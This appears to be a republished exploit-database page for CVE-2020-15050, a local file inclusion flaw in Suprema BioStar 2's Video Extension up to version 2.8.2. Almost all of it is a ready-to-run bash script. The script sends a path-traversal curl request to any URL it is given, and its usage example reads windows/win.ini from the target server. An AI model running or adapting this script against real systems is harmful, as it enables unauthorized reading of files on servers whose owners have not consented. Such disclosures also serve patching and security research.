[webapps] Bio Star 2.8.2 - Local File Inclusion

4 years ago 196
BOOK THIS SPACE FOR AD
ARTICLE AD
# Exploit Title: Bio Star 2.8.2 - Local File Inclusion # Authors: SITE Team (Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi) # Google Dork: N/A # Date of Exploit Release: 2020-07-13 # Exploit Author: SITE Team # Vendor Homepage: https://www.supremainc.com/en/main.asp # Software Link: https://www.supremainc.com/en/support/biostar-2-pakage.asp # Version: Bio Star 2, Video Extension up to version 2.8.2 # Tested on: Windows # CVE : CVE-2020-15050 #!/bin/bash # Exploit Title: Video Extension of Bio Star up to 2.8.1 Local File Inclusion Exploit # Authors: SITE Team (Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi) # Google Dork: N/A # Date of Exploit Release: 13/7/2020 # Exploit Author: SITE Team # Vendor Homepage: https://www.supremainc.com/en/main.asp # Software Link: https://www.supremainc.com/en/support/biostar-2-pakage.asp # Version: Bio Star 2, Video Extension up to version 2.8.1 # Tested on: Windows # CVE : CVE-2020-15050 echo "*********** SITE TEAM *********************" echo "*********** Video Extension of Bio Star 2 Local File Inclusion Exploit ***********" echo "*********** Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi *********************" if [ -z "$*" ]; then echo "Usage Example: ./exploit.sh https://website/ ../../../../../../../../../../../../windows/win.ini" echo "*******************************************" else args=("$@") curl -X GET --path-as-is -k ${args[0]}${args[1]} fi
Read Entire Article